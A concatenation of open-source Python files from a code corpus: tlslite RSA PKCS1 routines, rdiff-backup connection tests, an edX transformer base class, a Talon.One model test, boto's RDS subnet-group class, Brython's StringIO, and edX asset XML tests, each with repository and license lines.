paddedBytes = self._addPKCS1Padding(bytes, 1)
c = bytesToNumber(sigBytes)
if c >= self.n:
return False
m = self._rawPublicKeyOp(c)
checkBytes = numberToBytes(m)
return checkBytes == paddedBytes
def encrypt(self, bytes):
"""Encrypt the passed-in bytes.
This performs PKCS1 encryption of the passed-in data.
@type bytes: L{array.array} of unsigned bytes
@param bytes: The value which will be encrypted.
@rtype: L{array.array} of unsigned bytes.
@return: A PKCS1 encryption of the passed-in data.
"""
paddedBytes = self._addPKCS1Padding(bytes, 2)
m = bytesToNumber(paddedBytes)
if m >= self.n:
raise ValueError()
c = self._rawPublicKeyOp(m)
encBytes = numberToBytes(c)
return encBytes
def decrypt(self, encBytes):
"""Decrypt the passed-in bytes.
This requires the key to have a private component. It performs
PKCS1 decryption of the passed-in data.
@type encBytes: L{array.array} of unsigned bytes
@param encBytes: The value which will be decrypted.
@rtype: L{array.array} of unsigned bytes or None.
@return: A PKCS1 decryption of the passed-in data or None if
the data is not properly formatted.
"""
if not self.hasPrivateKey():
raise AssertionError()
c = bytesToNumber(encBytes)
if c >= self.n:
return None
m = self._rawPrivateKeyOp(c)
decBytes = numberToBytes(m)
if (len(decBytes) != numBytes(self.n)-1): #Check first byte
return None
if decBytes[0] != 2: #Check second byte
return None
for x in range(len(decBytes)-1): #Scan through for zero separator
if decBytes[x]== 0:
break
else:
return None
return decBytes[x+1:] #Return everything after the separator
def _rawPrivateKeyOp(self, m):
raise NotImplementedError()
def _rawPublicKeyOp(self, c):
raise NotImplementedError()
def acceptsPassword(self):
"""Return True if the write() method accepts a password for use
in encrypting the private key.
@rtype: bool
"""
raise NotImplementedError()
def write(self, password=None):
"""Return a string containing the key.
@rtype: str
@return: A string describing the key, in whichever format (PEM
or XML) is native to the implementation.
"""
raise NotImplementedError()
def writeXMLPublicKey(self, indent=''):
"""Return a string containing the key.
@rtype: str
@return: A string describing the public key, in XML format.
"""
return Python_RSAKey(self.n, self.e).write(indent)
def generate(bits):
"""Generate a new key with the specified bit length.
@rtype: L{tlslite.utils.RSAKey.RSAKey}
"""
raise NotImplementedError()
generate = staticmethod(generate)
# **************************************************************************
# Helper Functions for RSA Keys
# **************************************************************************
def _addPKCS1SHA1Prefix(self, bytes):
prefixBytes = createByteArraySequence(\
[48,33,48,9,6,5,43,14,3,2,26,5,0,4,20])
prefixedBytes = prefixBytes + bytes
return prefixedBytes
def _addPKCS1Padding(self, bytes, blockType):
padLength = (numBytes(self.n) - (len(bytes)+3))
if blockType == 1: #Signature padding
pad = [0xFF] * padLength
elif blockType == 2: #Encryption padding
pad = createByteArraySequence([])
while len(pad) < padLength:
padBytes = getRandomBytes(padLength * 2)
pad = [b for b in padBytes if b != 0]
pad = pad[:padLength]
else:
raise AssertionError()
#NOTE: To be proper, we should add [0,blockType]. However,
#the zero is lost when the returned padding is converted
#to a number, so we don't even bother with it. Also,
#adding it would cause a misalignment in verify()
padding = createByteArraySequence([blockType] + pad + [0])
paddedBytes = padding + bytes
return paddedBytes
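# Usage sketch for the concrete subclasses. Per the class docstring, keys are
# obtained through the factory functions in tlslite.utils.keyfactory rather
# than by instantiating these classes directly; generateRSAKey below is
# assumed to be one of those factories:
#
#   from tlslite.utils import keyfactory
#   key = keyfactory.generateRSAKey(1024)      # returns an RSAKey subclass
#   sig = key.hashAndSign("some data")         # PKCS1-SHA1 signature
#   assert key.hashAndVerify(sig, "some data")
#   enc = key.encrypt(stringToBytes("secret")) # PKCS1 type-2 encryption
#   assert bytesToString(key.decrypt(enc)) == "secret"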
| apache-2.0 |
makinacorpus/rdiff-backup | testing/connectiontest.py | 4 | 6912 | import unittest, types, tempfile, os, sys
from commontest import *
from rdiff_backup.connection import *
from rdiff_backup import Globals, rpath, FilenameMapping
class LocalConnectionTest(unittest.TestCase):
"""Test the dummy connection"""
lc = Globals.local_connection
def testGetAttrs(self):
"""Test getting of various attributes"""
assert type(self.lc.LocalConnection) is types.ClassType
try: self.lc.asotnuhaoseu
except (NameError, KeyError): pass
else: unittest.fail("NameError or KeyError should be raised")
def testSetattrs(self):
"""Test setting of global attributes"""
self.lc.x = 5
assert self.lc.x == 5
self.lc.x = 7
assert self.lc.x == 7
def testDelattrs(self):
"""Testing deletion of attributes"""
self.lc.x = 5
del self.lc.x
try: self.lc.x
except (NameError, KeyError): pass
else: unittest.fail("No exception raised")
def testReval(self):
"""Test string evaluation"""
assert self.lc.reval("pow", 2, 3) == 8
class LowLevelPipeConnectionTest(unittest.TestCase):
"""Test LLPC class"""
objs = ["Hello", ("Tuple", "of", "strings"),
[1, 2, 3, 4], 53.34235]
excts = [TypeError("te"), NameError("ne"), os.error("oe")]
filename = tempfile.mktemp()
def testObjects(self):
"""Try moving objects across connection"""
outpipe = open(self.filename, "w")
LLPC = LowLevelPipeConnection(None, outpipe)
for obj in self.objs: LLPC._putobj(obj, 3)
outpipe.close()
inpipe = open(self.filename, "r")
LLPC.inpipe = inpipe
for obj in self.objs:
gotten = LLPC._get()
assert gotten == (3, obj), gotten
        inpipe.close()
os.unlink(self.filename)
def testBuf(self):
"""Try moving a buffer"""
outpipe = open(self.filename, "w")
LLPC = LowLevelPipeConnection(None, outpipe)
inbuf = open("testfiles/various_file_types/regular_file", "r").read()
LLPC._putbuf(inbuf, 234)
outpipe.close()
inpipe = open(self.filename, "r")
LLPC.inpipe = inpipe
assert (234, inbuf) == LLPC._get()
inpipe.close()
os.unlink(self.filename)
def testSendingExceptions(self):
"""Exceptions should also be sent down pipe well"""
outpipe = open(self.filename, "w")
LLPC = LowLevelPipeConnection(None, outpipe)
for exception in self.excts: LLPC._putobj(exception, 0)
outpipe.close()
inpipe = open(self.filename, "r")
LLPC.inpipe = inpipe
for exception in self.excts:
incoming_exception = LLPC._get()
assert isinstance(incoming_exception[1], exception.__class__)
inpipe.close()
os.unlink(self.filename)
class PipeConnectionTest(unittest.TestCase):
"""Test Pipe connection"""
regfilename = "testfiles/various_file_types/regular_file"
def setUp(self):
"""Must start a server for this"""
stdin, stdout = os.popen2("python ./server.py "+SourceDir)
self.conn = PipeConnection(stdout, stdin)
Globals.security_level = "override"
#self.conn.Log.setverbosity(9)
#Log.setverbosity(9)
def testBasic(self):
"""Test some basic pipe functions"""
assert self.conn.ord("a") == 97
assert self.conn.pow(2,3) == 8
assert self.conn.reval("ord", "a") == 97
def testModules(self):
"""Test module emulation"""
assert type(self.conn.tempfile.mktemp()) is types.StringType
assert self.conn.os.path.join("a", "b") == "a/b"
rp1 = rpath.RPath(self.conn, self.regfilename)
assert rp1.isreg()
def testVirtualFiles(self):
"""Testing virtual files"""
tempout = self.conn.open("testfiles/tempout", "w")
assert isinstance(tempout, VirtualFile)
regfilefp = open(self.regfilename, "r")
rpath.copyfileobj(regfilefp, tempout)
tempout.close()
regfilefp.close()
tempoutlocal = open("testfiles/tempout", "r")
regfilefp = open(self.regfilename, "r")
assert rpath.cmpfileobj(regfilefp, tempoutlocal)
tempoutlocal.close()
regfilefp.close()
os.unlink("testfiles/tempout")
assert rpath.cmpfileobj(self.conn.open(self.regfilename, "r"),
open(self.regfilename, "r"))
def testString(self):
"""Test transmitting strings"""
assert "32" == self.conn.str(32)
assert 32 == self.conn.int("32")
def testIterators(self):
"""Test transmission of iterators"""
i = iter([5, 10, 15]*100)
assert self.conn.hasattr(i, "next")
ret_val = self.conn.reval("lambda i: i.next()*i.next()", i)
assert ret_val == 50, ret_val
def testRPaths(self):
"""Test transmission of rpaths"""
rp = rpath.RPath(self.conn,
"testfiles/various_file_types/regular_file")
assert self.conn.reval("lambda rp: rp.data", rp) == rp.data
assert self.conn.reval("lambda rp: rp.conn is Globals.local_connection", rp)
def testQuotedRPaths(self):
"""Test transmission of quoted rpaths"""
qrp = FilenameMapping.QuotedRPath(self.conn,
"testfiles/various_file_types/regular_file")
assert self.conn.reval("lambda qrp: qrp.data", qrp) == qrp.data
assert qrp.isreg(), qrp
qrp_class_str = self.conn.reval("lambda qrp: str(qrp.__class__)", qrp)
assert qrp_class_str.find("QuotedRPath") > -1, qrp_class_str
def testExceptions(self):
"""Test exceptional results"""
self.assertRaises(os.error, self.conn.os.lstat,
"asoeut haosetnuhaoseu tn")
self.assertRaises(SyntaxError, self.conn.reval,
"aoetnsu aoehtnsu")
assert self.conn.pow(2,3) == 8
def tearDown(self):
"""Bring down connection"""
self.conn.quit()
class RedirectedConnectionTest(unittest.TestCase):
"""Test routing and redirection"""
def setUp(self):
"""Must start two servers for this"""
#Log.setverbosity(9)
self.conna = SetConnections.init_connection("python ./server.py " +
SourceDir)
self.connb = SetConnections.init_connection("python ./server.py " +
SourceDir)
def testBasic(self):
"""Test basic operations with redirection"""
self.conna.Globals.set("tmp_val", 1)
self.connb.Globals.set("tmp_val", 2)
assert self.conna.Globals.get("tmp_val") == 1
assert self.connb.Globals.get("tmp_val") == 2
self.conna.Globals.set("tmp_connb", self.connb)
self.connb.Globals.set("tmp_conna", self.conna)
assert self.conna.Globals.get("tmp_connb") is self.connb
assert self.connb.Globals.get("tmp_conna") is self.conna
val = self.conna.reval("Globals.get('tmp_connb').Globals.get",
"tmp_val")
assert val == 2, val
val = self.connb.reval("Globals.get('tmp_conna').Globals.get",
"tmp_val")
assert val == 1, val
assert self.conna.reval("Globals.get('tmp_connb').pow", 2, 3) == 8
self.conna.reval("Globals.tmp_connb.reval",
"Globals.tmp_conna.Globals.set", "tmp_marker", 5)
assert self.conna.Globals.get("tmp_marker") == 5
def testRpaths(self):
"""Test moving rpaths back and forth across connections"""
rp = rpath.RPath(self.conna, "foo")
self.connb.Globals.set("tmp_rpath", rp)
rp_returned = self.connb.Globals.get("tmp_rpath")
assert rp_returned.conn is rp.conn
assert rp_returned.path == rp.path
def tearDown(self):
SetConnections.CloseConnections()
if __name__ == "__main__": unittest.main()
| gpl-2.0 |
ESOedX/edx-platform | openedx/core/djangoapps/content/block_structure/transformer.py | 2 | 9170 | """
This module provides the abstract base class for all Block Structure
Transformers.
"""
from __future__ import absolute_import
from abc import abstractmethod
class BlockStructureTransformer(object):
"""
Abstract base class for all block structure transformers.
"""
# All Transformers are expected to maintain version-related class
# attributes. While the values for the base class is set to 0,
# the values for each concrete transformer should be 1 or higher.
#
# A transformer's version attributes are used by the block_structure
# framework in order to determine whether any collected data for a
# transformer is outdated because of a data schema change by the
# transformer.
#
# The WRITE_VERSION number is stored along with the transformer's
# data when it is collected and cached (during the collect phase).
# The READ_VERSION number is then verified to be less than or equal
# to the version associated with the collected data when the
# collected data is accessed (during the transform phase).
#
# We distinguish between WRITE_VERSION and READ_VERSION numbers in
# order to:
# 1. support blue-green deployments where new and previous versions
# of the code base are simultaneously executing on different
# workers for a period of time.
#
# A 2-phase deployment is used to stagger read and write changes.
#
# 2. scale for large deployments where it is costly to recompute
# block structures for all courses when a transformer's collected
# data schema changes.
#
# A background management command is run to prime the new data.
#
# See the following document for further information:
# https://openedx.atlassian.net/wiki/display/MA/Block+Structure+Cache+Invalidation+Proposal
#
# The WRITE_VERSION number of a Transformer should be incremented
    # when its collect implementation is additively changed. Backward
# compatibility should be maintained with previous READ_VERSIONs
# until all readers are updated.
#
# The READ_VERSION number of a Transformer should be incremented
# when its transform implementation is updated to make use of the
# newly collected data - and released only after all collected
# block structures are updated with the new WRITE_VERSION.
#
WRITE_VERSION = 0
READ_VERSION = 0
@classmethod
def name(cls):
"""
Unique identifier for the transformer's class. It is used to
identify the transformer's cached data. So it should be unique
and not conflict with other transformers. Consider using the
same name that is used in the Transformer Registry. For example,
for Stevedore, it is specified in the setup.py file.
Once the transformer is in use and its data is cached, do not
modify this name value without consideration of backward
compatibility with previously collected data.
"""
raise NotImplementedError
@classmethod
def collect(cls, block_structure):
"""
Collects and stores any xBlock and modulestore data into the
block_structure that's necessary for later execution of the
transformer's transform method. Transformers should store such
data in the block_structure using the following methods:
set_transformer_data
set_transformer_block_field
request_xblock_fields
Transformers can call block_structure.request_xblock_fields for
any common xBlock fields that should be collected by the
framework.
Any full block tree traversals should be implemented in this
collect phase, leaving the transform phase for fast and direct
access to a sub-block. If a block's transform output is
        dependent on its ancestors' data, the ancestors' data should be
percolated down to the descendants. So when a (non-root) block
is directly accessed in the transform, all of its relevant data
is readily available (without needing to access its ancestors).
Traversals of the block_structure can be implemented using the
following methods:
topological_traversal
post_order_traversal
Arguments:
block_structure (BlockStructureModulestoreData) - A mutable
block structure that is to be modified with collected
data to be cached for the transformer.
"""
pass
@abstractmethod
def transform(self, usage_info, block_structure):
"""
Transforms the given block_structure for the given usage_info,
assuming the block_structure contains cached data from a prior
call to the collect method of the latest version of the
Transformer.
No access to the modulestore nor instantiation of xBlocks should
be performed during the execution of this method. However,
accesses to user-specific data (outside of the modulestore and
        not via xBlocks) are permitted in order to apply the transform
for the given usage_info.
Note: The root of the given block_structure is not necessarily
the same as the root of the block_structure passed to the prior
collect method. The collect method is given the top-most root
of the structure, while the transform method may be called upon
any sub-structure or even a single block within the originally
collected structure.
A Transformer may choose to remove entire sub-structures during
the transform method and may do so using the remove_block and
filter_with_removal methods.
Amongst the many methods available for a block_structure, the
following methods are commonly used during transforms:
get_xblock_field
get_transformer_data
get_transformer_block_field
remove_block_traversal
filter_with_removal
filter_topological_traversal
topological_traversal
post_order_traversal
Arguments:
usage_info (any negotiated type) - A usage-specific object
that is passed to the block_structure and forwarded to all
requested Transformers in order to apply a
usage-specific transform. For example, an instance of
usage_info would contain a user object for which the
transform should be applied.
block_structure (BlockStructureBlockData) - A mutable
block structure, with already collected data for the
transformer, that is to be transformed in place.
"""
raise NotImplementedError
class FilteringTransformerMixin(BlockStructureTransformer):
"""
Transformers may optionally choose to implement this mixin if their
transform logic can be broken apart into a lambda for optimization of
combined tree traversals.
For performance reasons, developers should try to implement this mixin
whenever possible - with this alternative, traversal of the entire block
structure happens only once for all transformers that implement
FilteringTransformerMixin.
"""
def transform(self, usage_info, block_structure):
"""
By defining this method, FilteringTransformers can be run individually
if desired. In normal operations, the filters returned from multiple
transform_block_filters calls will be combined and used in a single
tree traversal.
"""
block_structure.filter_topological_traversal(self.transform_block_filters(usage_info, block_structure))
@abstractmethod
def transform_block_filters(self, usage_info, block_structure):
"""
This is an alternative to the standard transform method.
Returns a list of filter functions to be used for filtering out
any unwanted blocks in the given block_structure.
In addition to the commonly used methods listed above, the following
methods are commonly used by implementations of transform_block_filters:
create_universal_filter
create_removal_filter
Note: Transformers that implement this alternative should be
independent of all other registered transformers as they may not
be applied in the order in which they were listed in the registry.
Arguments:
usage_info (any negotiated type) - A usage-specific object
that is passed to the block_structure and forwarded to all
requested Transformers in order to apply a
usage-specific transform. For example, an instance of
usage_info would contain a user object for which the
transform should be applied.
block_structure (BlockStructureBlockData) - A mutable
block structure, with already collected data for the
transformer, that is to be transformed in place.
"""
raise NotImplementedError
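# A minimal sketch of a concrete transformer built on the classes above. The
# 'due' field and the filtering criterion are illustrative assumptions; only
# the hooks (name, version attributes, collect, transform_block_filters) and
# the block_structure methods named in the docstrings are part of the
# documented contract, and create_removal_filter is assumed to take a
# predicate over block keys:
#
# class HideNoDueDateTransformer(FilteringTransformerMixin):
#     WRITE_VERSION = 1
#     READ_VERSION = 1
#
#     @classmethod
#     def name(cls):
#         return "hide_no_due_date"
#
#     @classmethod
#     def collect(cls, block_structure):
#         # Gather the 'due' field while the modulestore is available.
#         block_structure.request_xblock_fields('due')
#
#     def transform_block_filters(self, usage_info, block_structure):
#         return [block_structure.create_removal_filter(
#             lambda block_key: block_structure.get_xblock_field(
#                 block_key, 'due') is None)]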
| agpl-3.0 |
talon-one/talon_one.py | test/test_loyalty_membership.py | 1 | 2104 | # coding: utf-8
"""
Talon.One API
The Talon.One API is used to manage applications and campaigns, as well as to integrate with your application. The operations in the _Integration API_ section are used to integrate with our platform, while the other operations are used to manage applications and campaigns. ### Where is the API? The API is available at the same hostname as these docs. For example, if you are reading this page at `https://mycompany.talon.one/docs/api/`, the URL for the [updateCustomerProfile][] operation is `https://mycompany.talon.one/v1/customer_profiles/id` [updateCustomerProfile]: #operation--v1-customer_profiles--integrationId--put # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import talon_one
from talon_one.models.loyalty_membership import LoyaltyMembership # noqa: E501
from talon_one.rest import ApiException
class TestLoyaltyMembership(unittest.TestCase):
"""LoyaltyMembership unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test LoyaltyMembership
            include_optional is a boolean: when False only required
params are included, when True both required and
optional params are included """
# model = talon_one.models.loyalty_membership.LoyaltyMembership() # noqa: E501
if include_optional :
return LoyaltyMembership(
joined = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
loyalty_program_id = 56
)
else :
return LoyaltyMembership(
loyalty_program_id = 56,
)
def testLoyaltyMembership(self):
"""Test LoyaltyMembership"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
| mit |
listingmirror/boto | boto/rds/dbsubnetgroup.py | 170 | 2825 | # Copyright (c) 2013 Franc Carter - [email protected]
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Represents an DBSubnetGroup
"""
class DBSubnetGroup(object):
"""
Represents an RDS database subnet group
Properties reference available from the AWS documentation at http://docs.amazonwebservices.com/AmazonRDS/latest/APIReference/API_DeleteDBSubnetGroup.html
    :ivar status: The current status of the subnet group. Possible values are [ active, ? ]. Reference documentation lacks specifics of possibilities
:ivar connection: boto.rds.RDSConnection associated with the current object
:ivar description: The description of the subnet group
:ivar subnet_ids: List of subnet identifiers in the group
:ivar name: Name of the subnet group
:ivar vpc_id: The ID of the VPC the subnets are inside
"""
def __init__(self, connection=None, name=None, description=None, subnet_ids=None):
self.connection = connection
self.name = name
self.description = description
if subnet_ids is not None:
self.subnet_ids = subnet_ids
else:
self.subnet_ids = []
self.vpc_id = None
self.status = None
def __repr__(self):
return 'DBSubnetGroup:%s' % self.name
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'SubnetIdentifier':
self.subnet_ids.append(value)
elif name == 'DBSubnetGroupName':
self.name = value
elif name == 'DBSubnetGroupDescription':
self.description = value
elif name == 'VpcId':
self.vpc_id = value
elif name == 'SubnetGroupStatus':
self.status = value
else:
setattr(self, name, value)
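# Sketch of how boto's XML response handler drives this class while parsing
# a DescribeDBSubnetGroups result (the values are made up):
#
#   group = DBSubnetGroup()
#   group.endElement('DBSubnetGroupName', 'my-subnets', None)
#   group.endElement('SubnetIdentifier', 'subnet-0a1b2c3d', None)
#   group.endElement('SubnetIdentifier', 'subnet-4e5f6a7b', None)
#   group.endElement('SubnetGroupStatus', 'Complete', None)
#   # group.subnet_ids is now ['subnet-0a1b2c3d', 'subnet-4e5f6a7b']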
| mit |
40223101/w17test | static/Brython3.1.1-20150328-091302/Lib/io.py | 623 | 9405 | import builtins
open = builtins.open
# for seek()
SEEK_SET = 0
SEEK_CUR = 1
SEEK_END = 2
r"""File-like objects that read from or write to a string buffer.
This implements (nearly) all stdio methods.
f = StringIO() # ready for writing
f = StringIO(buf) # ready for reading
f.close() # explicitly release resources held
flag = f.isatty() # always false
pos = f.tell() # get current position
f.seek(pos) # set current position
f.seek(pos, mode) # mode 0: absolute; 1: relative; 2: relative to EOF
buf = f.read() # read until EOF
buf = f.read(n) # read up to n bytes
buf = f.readline() # read until end of line ('\n') or EOF
list = f.readlines()# list of f.readline() results until EOF
f.truncate([size]) # truncate file at to at most size (default: current pos)
f.write(buf) # write at current position
f.writelines(list) # for line in list: f.write(line)
f.getvalue() # return whole file's contents as a string
Notes:
- Using a real file is often faster (but less convenient).
- There's also a much faster implementation in C, called cStringIO, but
it's not subclassable.
- fileno() is left unimplemented so that code which uses it triggers
an exception early.
- Seeking far beyond EOF and then writing will insert real null
bytes that occupy space in the buffer.
- There's a simple test set (see end of this file).
"""
try:
from errno import EINVAL
except ImportError:
EINVAL = 22
__all__ = ["StringIO"]
def _complain_ifclosed(closed):
if closed:
raise ValueError("I/O operation on closed file")
class StringIO:
"""class StringIO([buffer])
When a StringIO object is created, it can be initialized to an existing
string by passing the string to the constructor. If no string is given,
the StringIO will start empty.
The StringIO object can accept either Unicode or 8-bit strings, but
mixing the two may take some care. If both are used, 8-bit strings that
cannot be interpreted as 7-bit ASCII (that use the 8th bit) will cause
a UnicodeError to be raised when getvalue() is called.
"""
def __init__(self, buf = ''):
self.buf = buf
self.len = len(buf)
self.buflist = []
self.pos = 0
self.closed = False
self.softspace = 0
def __iter__(self):
return self
    def __next__(self):
"""A file object is its own iterator, for example iter(f) returns f
(unless f is closed). When a file is used as an iterator, typically
        in a for loop (for example, for line in f: print(line)), the
        __next__() method is called repeatedly. This method returns the next input line,
or raises StopIteration when EOF is hit.
"""
_complain_ifclosed(self.closed)
r = self.readline()
if not r:
raise StopIteration
        return r
    next = __next__  # Python 2 compatibility alias for the method above
def close(self):
"""Free the memory buffer.
"""
if not self.closed:
self.closed = True
del self.buf, self.pos
def isatty(self):
"""Returns False because StringIO objects are not connected to a
tty-like device.
"""
_complain_ifclosed(self.closed)
return False
def seek(self, pos, mode = 0):
"""Set the file's current position.
The mode argument is optional and defaults to 0 (absolute file
positioning); other values are 1 (seek relative to the current
position) and 2 (seek relative to the file's end).
There is no return value.
"""
_complain_ifclosed(self.closed)
if self.buflist:
self.buf += ''.join(self.buflist)
self.buflist = []
if mode == 1:
pos += self.pos
elif mode == 2:
pos += self.len
self.pos = max(0, pos)
def tell(self):
"""Return the file's current position."""
_complain_ifclosed(self.closed)
return self.pos
def read(self, n = -1):
"""Read at most size bytes from the file
(less if the read hits EOF before obtaining size bytes).
If the size argument is negative or omitted, read all data until EOF
is reached. The bytes are returned as a string object. An empty
string is returned when EOF is encountered immediately.
"""
_complain_ifclosed(self.closed)
if self.buflist:
self.buf += ''.join(self.buflist)
self.buflist = []
if n is None or n < 0:
newpos = self.len
else:
newpos = min(self.pos+n, self.len)
r = self.buf[self.pos:newpos]
self.pos = newpos
return r
def readline(self, length=None):
r"""Read one entire line from the file.
A trailing newline character is kept in the string (but may be absent
when a file ends with an incomplete line). If the size argument is
present and non-negative, it is a maximum byte count (including the
trailing newline) and an incomplete line may be returned.
An empty string is returned only when EOF is encountered immediately.
Note: Unlike stdio's fgets(), the returned string contains null
characters ('\0') if they occurred in the input.
"""
_complain_ifclosed(self.closed)
if self.buflist:
self.buf += ''.join(self.buflist)
self.buflist = []
i = self.buf.find('\n', self.pos)
if i < 0:
newpos = self.len
else:
newpos = i+1
if length is not None and length >= 0:
if self.pos + length < newpos:
newpos = self.pos + length
r = self.buf[self.pos:newpos]
self.pos = newpos
return r
def readlines(self, sizehint = 0):
"""Read until EOF using readline() and return a list containing the
lines thus read.
        If the optional sizehint argument is present, instead of reading up
        to EOF, whole lines totalling approximately sizehint bytes are read
        (possibly more, to accommodate a final whole line).
"""
total = 0
lines = []
line = self.readline()
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline()
return lines
def truncate(self, size=None):
"""Truncate the file's size.
If the optional size argument is present, the file is truncated to
(at most) that size. The size defaults to the current position.
The current file position is not changed unless the position
is beyond the new file size.
If the specified size exceeds the file's current size, the
file remains unchanged.
"""
_complain_ifclosed(self.closed)
if size is None:
size = self.pos
elif size < 0:
raise IOError(EINVAL, "Negative size not allowed")
elif size < self.pos:
self.pos = size
self.buf = self.getvalue()[:size]
self.len = size
def write(self, s):
"""Write a string to the file.
There is no return value.
"""
_complain_ifclosed(self.closed)
if not s: return
spos = self.pos
slen = self.len
if spos == slen:
self.buflist.append(s)
self.len = self.pos = spos + len(s)
return
if spos > slen:
self.buflist.append('\0'*(spos - slen))
slen = spos
newpos = spos + len(s)
if spos < slen:
if self.buflist:
self.buf += ''.join(self.buflist)
self.buflist = [self.buf[:spos], s, self.buf[newpos:]]
self.buf = ''
if newpos > slen:
slen = newpos
else:
self.buflist.append(s)
slen = newpos
self.len = slen
self.pos = newpos
def writelines(self, iterable):
"""Write a sequence of strings to the file. The sequence can be any
iterable object producing strings, typically a list of strings. There
is no return value.
(The name is intended to match readlines(); writelines() does not add
line separators.)
"""
write = self.write
for line in iterable:
write(line)
def flush(self):
"""Flush the internal buffer
"""
_complain_ifclosed(self.closed)
def getvalue(self):
"""
Retrieve the entire contents of the "file" at any time before
the StringIO object's close() method is called.
The StringIO object can accept either Unicode or 8-bit strings,
but mixing the two may take some care. If both are used, 8-bit
strings that cannot be interpreted as 7-bit ASCII (that use the
8th bit) will cause a UnicodeError to be raised when getvalue()
is called.
"""
_complain_ifclosed(self.closed)
if self.buflist:
self.buf += ''.join(self.buflist)
self.buflist = []
return self.buf
TextIOWrapper = StringIO
class RawIOBase:
def read(self,n=-1):
pass
def readall(self):
pass
def readinto(self,b):
pass
def write(self,b):
pass
BufferedReader = RawIOBase
#from _io import *
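if __name__ == '__main__':
    # Quick self-check of the pure-Python StringIO implemented above.
    f = StringIO()
    f.write("first line\n")
    f.writelines(["second line\n", "third"])
    assert f.getvalue() == "first line\nsecond line\nthird"
    f.seek(0)
    assert f.readline() == "first line\n"
    f.seek(-5, SEEK_END)   # position 5 bytes before the end of the buffer
    assert f.read() == "third"
    f.close()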
| gpl-3.0 |
Edraak/edraak-platform | common/lib/xmodule/xmodule/assetstore/tests/test_asset_xml.py | 13 | 3646 | """
Test for asset XML generation / parsing.
"""
import unittest
from path import Path as path
from lxml import etree
from contracts import ContractNotRespected
from opaque_keys.edx.locator import CourseLocator
from xmodule.assetstore import AssetMetadata
from xmodule.modulestore.tests.test_assetstore import AssetStoreTestData
class TestAssetXml(unittest.TestCase):
"""
Tests for storing/querying course asset metadata.
"""
shard = 1
def setUp(self):
super(TestAssetXml, self).setUp()
xsd_filename = "assets.xsd"
self.course_id = CourseLocator('org1', 'course1', 'run1')
self.course_assets = []
for asset in AssetStoreTestData.all_asset_data:
asset_dict = dict(zip(AssetStoreTestData.asset_fields[1:], asset[1:]))
asset_md = AssetMetadata(self.course_id.make_asset_key('asset', asset[0]), **asset_dict)
self.course_assets.append(asset_md)
# Read in the XML schema definition and make a validator.
xsd_path = path(__file__).realpath().parent / xsd_filename
with open(xsd_path, 'r') as f:
schema_root = etree.XML(f.read())
schema = etree.XMLSchema(schema_root)
self.xmlparser = etree.XMLParser(schema=schema)
def test_export_single_asset_to_from_xml(self):
"""
Export a single AssetMetadata to XML and verify the structure and fields.
"""
asset_md = self.course_assets[0]
root = etree.Element("assets")
asset = etree.SubElement(root, "asset")
asset_md.to_xml(asset)
# If this line does *not* raise, the XML is valid.
etree.fromstring(etree.tostring(root), self.xmlparser)
new_asset_key = self.course_id.make_asset_key('tmp', 'tmp')
new_asset_md = AssetMetadata(new_asset_key)
new_asset_md.from_xml(asset)
# Compare asset_md to new_asset_md.
for attr in AssetMetadata.XML_ATTRS:
if attr in AssetMetadata.XML_ONLY_ATTRS:
continue
orig_value = getattr(asset_md, attr)
new_value = getattr(new_asset_md, attr)
self.assertEqual(orig_value, new_value)
def test_export_with_None_value(self):
"""
Export and import a single AssetMetadata to XML with a None created_by field, without causing an exception.
"""
asset_md = AssetMetadata(
self.course_id.make_asset_key('asset', 'none_value'),
created_by=None,
)
asset = etree.Element("asset")
asset_md.to_xml(asset)
asset_md.from_xml(asset)
def test_export_all_assets_to_xml(self):
"""
Export all AssetMetadatas to XML and verify the structure and fields.
"""
root = etree.Element("assets")
AssetMetadata.add_all_assets_as_xml(root, self.course_assets)
# If this line does *not* raise, the XML is valid.
etree.fromstring(etree.tostring(root), self.xmlparser)
def test_wrong_node_type_all(self):
"""
Ensure full asset sections with the wrong tag are detected.
"""
root = etree.Element("glassets")
with self.assertRaises(ContractNotRespected):
AssetMetadata.add_all_assets_as_xml(root, self.course_assets)
def test_wrong_node_type_single(self):
"""
Ensure single asset blocks with the wrong tag are detected.
"""
asset_md = self.course_assets[0]
root = etree.Element("assets")
asset = etree.SubElement(root, "smashset")
with self.assertRaises(ContractNotRespected):
asset_md.to_xml(asset)
| agpl-3.0 |
thjashin/tensorflow | tensorflow/contrib/session_bundle/gc_test.py | 34 | 4560 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for session_bundle.gc."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import re
